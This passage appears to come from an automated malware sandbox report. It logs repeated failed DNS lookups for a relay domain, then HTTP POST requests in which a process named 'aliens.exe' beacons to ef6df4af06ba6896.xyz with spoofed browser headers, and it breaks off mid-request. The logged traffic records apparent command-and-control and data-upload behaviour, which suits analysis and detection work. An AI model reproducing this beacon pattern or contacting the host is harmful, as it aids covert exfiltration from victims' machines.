                                                                                                                                                  Dec 5, 2020 08:44:08.032026052 CET8.8.8.8192.168.2.30x30c1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:08.579233885 CET8.8.8.8192.168.2.30xe50bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:09.117932081 CET8.8.8.8192.168.2.30x44d1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:09.650924921 CET8.8.8.8192.168.2.30xef1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:10.189573050 CET8.8.8.8192.168.2.30xd095Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:10.736742973 CET8.8.8.8192.168.2.30x7ed4Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:11.259766102 CET8.8.8.8192.168.2.30xa443Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:11.814625025 CET8.8.8.8192.168.2.30xbcd9Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:12.592415094 CET8.8.8.8192.168.2.30xe663Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:13.201133013 CET8.8.8.8192.168.2.30x711dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:14.384213924 CET8.8.8.8192.168.2.30x2267Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:14.915936947 CET8.8.8.8192.168.2.30x9788Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:15.457453966 CET8.8.8.8192.168.2.30xdcafName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:16.006361961 CET8.8.8.8192.168.2.30x122fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:16.544770956 CET8.8.8.8192.168.2.30x8a7fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:17.072150946 CET8.8.8.8192.168.2.30xd65dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:17.611612082 CET8.8.8.8192.168.2.30x1808Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:18.151106119 CET8.8.8.8192.168.2.30x905fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:18.707458019 CET8.8.8.8192.168.2.30xfbd3Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:19.244326115 CET8.8.8.8192.168.2.30x44adName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:19.776283979 CET8.8.8.8192.168.2.30x6843Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:20.331681013 CET8.8.8.8192.168.2.30xca7dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:20.869514942 CET8.8.8.8192.168.2.30x492Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:21.384578943 CET8.8.8.8192.168.2.30x769fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:21.917773962 CET8.8.8.8192.168.2.30x9e60Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:22.479697943 CET8.8.8.8192.168.2.30x8d8fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:23.010308027 CET8.8.8.8192.168.2.30x9f9bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:23.538587093 CET8.8.8.8192.168.2.30xf2e2Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:24.081728935 CET8.8.8.8192.168.2.30x434fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:24.627392054 CET8.8.8.8192.168.2.30xf3f3Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:25.151590109 CET8.8.8.8192.168.2.30xf392Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:25.699100018 CET8.8.8.8192.168.2.30xca6eName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:26.253832102 CET8.8.8.8192.168.2.30xb27dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:26.776443005 CET8.8.8.8192.168.2.30xee8fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:27.299865007 CET8.8.8.8192.168.2.30xb72cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:27.832472086 CET8.8.8.8192.168.2.30x7fabName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:28.374311924 CET8.8.8.8192.168.2.30x2273Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:28.910343885 CET8.8.8.8192.168.2.30xd524Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:29.431976080 CET8.8.8.8192.168.2.30xab11Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:29.969094038 CET8.8.8.8192.168.2.30x7ec4Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:30.574170113 CET8.8.8.8192.168.2.30x58e1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:31.119700909 CET8.8.8.8192.168.2.30xa3a5Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:31.639300108 CET8.8.8.8192.168.2.30x53cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:32.198580027 CET8.8.8.8192.168.2.30xb3a6Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:32.722119093 CET8.8.8.8192.168.2.30x1bd9Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:33.269009113 CET8.8.8.8192.168.2.30x3fdeName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:33.808217049 CET8.8.8.8192.168.2.30xbae7Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:34.331381083 CET8.8.8.8192.168.2.30x2cffName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:34.869741917 CET8.8.8.8192.168.2.30x8f55Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:35.387875080 CET8.8.8.8192.168.2.30xde4eName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:35.940874100 CET8.8.8.8192.168.2.30xefb1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:36.487648964 CET8.8.8.8192.168.2.30x76e6Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:37.040384054 CET8.8.8.8192.168.2.30xbfffName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:37.574875116 CET8.8.8.8192.168.2.30x5b38Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:38.089510918 CET8.8.8.8192.168.2.30x19afName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:38.604686975 CET8.8.8.8192.168.2.30xb75dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:39.136360884 CET8.8.8.8192.168.2.30x7d09Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:39.676059008 CET8.8.8.8192.168.2.30xb04eName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:40.230995893 CET8.8.8.8192.168.2.30x14baName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:40.761543989 CET8.8.8.8192.168.2.30x2ad0Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:41.285490036 CET8.8.8.8192.168.2.30x9080Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:41.809024096 CET8.8.8.8192.168.2.30xf744Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:42.343743086 CET8.8.8.8192.168.2.30xd5c9Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:42.879030943 CET8.8.8.8192.168.2.30x8c9cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:43.413537025 CET8.8.8.8192.168.2.30x55c1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:43.942786932 CET8.8.8.8192.168.2.30x7badName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:44.467500925 CET8.8.8.8192.168.2.30x405fName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:45.011172056 CET8.8.8.8192.168.2.30x415dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:45.527698040 CET8.8.8.8192.168.2.30x521cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:46.096565962 CET8.8.8.8192.168.2.30x912aName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:46.624881983 CET8.8.8.8192.168.2.30xf57cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:47.186608076 CET8.8.8.8192.168.2.30x2942Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:47.755641937 CET8.8.8.8192.168.2.30xf3d4Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:48.279632092 CET8.8.8.8192.168.2.30xe143Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:48.825647116 CET8.8.8.8192.168.2.30x59d5Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:49.344616890 CET8.8.8.8192.168.2.30x6525Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:49.886678934 CET8.8.8.8192.168.2.30x2253Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:50.418781042 CET8.8.8.8192.168.2.30xfacfName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:50.942514896 CET8.8.8.8192.168.2.30x66cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:51.481712103 CET8.8.8.8192.168.2.30xe583Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:51.997468948 CET8.8.8.8192.168.2.30xfc99Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:52.558666945 CET8.8.8.8192.168.2.30x20e2Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:53.074649096 CET8.8.8.8192.168.2.30xbb96Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:53.599467039 CET8.8.8.8192.168.2.30xdc95Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:54.122626066 CET8.8.8.8192.168.2.30xc8d3Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:54.661765099 CET8.8.8.8192.168.2.30xd67eName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:55.192456961 CET8.8.8.8192.168.2.30xfcc1Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:55.715823889 CET8.8.8.8192.168.2.30xd800Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:56.262578964 CET8.8.8.8192.168.2.30x89abName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:56.783624887 CET8.8.8.8192.168.2.30x8ec8Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:57.337253094 CET8.8.8.8192.168.2.30x4c3Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:57.857445002 CET8.8.8.8192.168.2.30xa191Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:58.405559063 CET8.8.8.8192.168.2.30xea8bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:58.950757980 CET8.8.8.8192.168.2.30xff92Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:59.481197119 CET8.8.8.8192.168.2.30x7b7cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:00.024873018 CET8.8.8.8192.168.2.30xefe7Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:00.559737921 CET8.8.8.8192.168.2.30xcd07Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:01.093219995 CET8.8.8.8192.168.2.30x8b57Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:01.625252962 CET8.8.8.8192.168.2.30x2300Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.171911955 CET8.8.8.8192.168.2.30x2707Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.211256981 CET8.8.8.8192.168.2.30x3c54No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.725611925 CET8.8.8.8192.168.2.30x2276Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:03.248840094 CET8.8.8.8192.168.2.30x1abaName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:03.764144897 CET8.8.8.8192.168.2.30x146bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:04.294631958 CET8.8.8.8192.168.2.30xf9deName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:04.810632944 CET8.8.8.8192.168.2.30xe7e9Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:05.357727051 CET8.8.8.8192.168.2.30xee33Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:05.905102015 CET8.8.8.8192.168.2.30xffeaName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:06.435257912 CET8.8.8.8192.168.2.30x4136Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:06.967833042 CET8.8.8.8192.168.2.30xbad5Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:07.497612953 CET8.8.8.8192.168.2.30xfbb4Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:08.013257027 CET8.8.8.8192.168.2.30xac9dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:08.530966997 CET8.8.8.8192.168.2.30x214aName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:09.060971022 CET8.8.8.8192.168.2.30x3d2eName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:09.593342066 CET8.8.8.8192.168.2.30xf783Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:10.139463902 CET8.8.8.8192.168.2.30xf14cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:10.654100895 CET8.8.8.8192.168.2.30xb07Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:11.169487953 CET8.8.8.8192.168.2.30x6263Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:11.703306913 CET8.8.8.8192.168.2.30xfa98Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:12.233783007 CET8.8.8.8192.168.2.30xeaa4Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:12.765013933 CET8.8.8.8192.168.2.30x9141Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • ef6df4af06ba6896.xyz

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.349734104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:41:53.420881033 CET3365OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 93
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:41:54.931421995 CET3953INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:41:54 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d3191a04f8f38c100d0b46620e75b327c1607154113; expires=Mon, 04-Jan-21 07:41:53 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d372b3990000277ca4227000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2FNND8WD06qx2ncRgj9CRTVDspo%2BlEch2GC4MN3p1JgozU3HRf7yd5WHlDmaYd%2Fl%2FB3tStd9tD4nPteb898VvVWUCO3HHptF10wzSo%2Bfm%2BmfgaaJkFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2098f80a277c-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:41:55.029978037 CET3954OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 93
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:41:57.531936884 CET3956INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:41:57 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=dfceae49fb62e0c4be3fefcb3f99721771607154115; expires=Mon, 04-Jan-21 07:41:55 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d372b9e20000277cda1e7000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=55fUzXMWEMnu9jdKhSwu4SNE6fASr92DHBis7Bi%2BJjmsFynFy%2BGH%2BdEqMFX2eyXsxNxfwLurNS7BiMrdr4HC46l7lt%2BeuzvmLs1ekBkdZpTa4P1QOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc20a30e30277c-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.349738104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:42:48.140707016 CET4256OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:42:52.078556061 CET4257INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:42:52 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d61870f397e3c2ce34e912cd445b0feca1607154168; expires=Mon, 04-Jan-21 07:42:48 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d3738958000041200987c000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Kbh7wCU69xHKSj5slB3Ixlf%2BlI%2Bkta8%2BVyHpBzoQukpdtqhySnLLObExlSeVadJDommJwsCmm88a8DEICmfNxX6lWmKCmEiSkliGiqg%2FPFWvp2TS3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc21eefc414120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:42:57.924711943 CET4258OUTPOST /info/e HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 677
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
